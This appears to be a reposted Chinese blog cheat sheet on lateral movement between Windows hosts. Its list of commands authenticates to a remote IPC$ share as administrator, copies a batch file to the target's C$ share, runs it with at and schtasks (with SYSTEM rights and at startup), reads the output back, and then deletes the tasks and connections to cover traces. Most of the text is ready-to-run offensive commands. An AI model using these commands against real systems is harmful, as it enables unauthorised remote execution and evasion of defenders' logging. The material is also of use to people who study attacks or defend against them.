- IPC
- 建立IPC
net use \\1.1.1.2\ipc$ "密码" /user:administrator
net use 可以查看状态 - IPC的利用条件
- 建立IPC
- 使用windows自带工具获取远程主机信息
- dir命令
-
tasklist 命令
- dir命令
- 计划任务
- at命令
主要工作在winserver2008之前版本的操作系统中。
- 查看目标系统时间
net time \\1.1.1.2 - 将文件复制到目标系统中
copy calc.bat \\1.1.1.2\C$ - 使用at创建计划任务
at \\1.1.1.2 16:18PM C:\calc.bat - 清楚at记录
at \\1.1.1.2 7 /delete
使用at远程执行命令后,先将执行结果写入本地文本文件,在使用type命令远程读取该文件
at \\1.1.1.2 16:18PM cmd.exe /c "ipconfig >C:/1.txt"
type \\1.1.1.2 \C$\1.txt
- 查看目标系统时间
- schtasks命令
在远程主机创建一个名为“test”的计划任务,该任务开机启动,启动程序为c盘下的calc.bat,启动权限为System
schtasks /creat /s 1.1.1.2 /tn test /sc onstart /tr c:\calc.bat /ru system /f
执行下面命令运行该计划任务
schtasks /run /s 1.1.1.2 /i /tn "test"
如果未建立IPC连接,需要输入密码时可以加上,/u username /p password
计划任务运行后,输入下面命令,删除该计划任务
schtasks /delete /s 1.1.1.2 /tn "test" /f
此后,还需删除ipc$
net use 名称 /del /y
使用schtasks命令,会留下日志在:C:\Windows\Tasks\SchedLgU.txt
- at命令
横向移动-常用windows连接和相关命令
猜你喜欢
转载自www.cnblogs.com/ly584521/p/12416099.html
今日推荐
周排行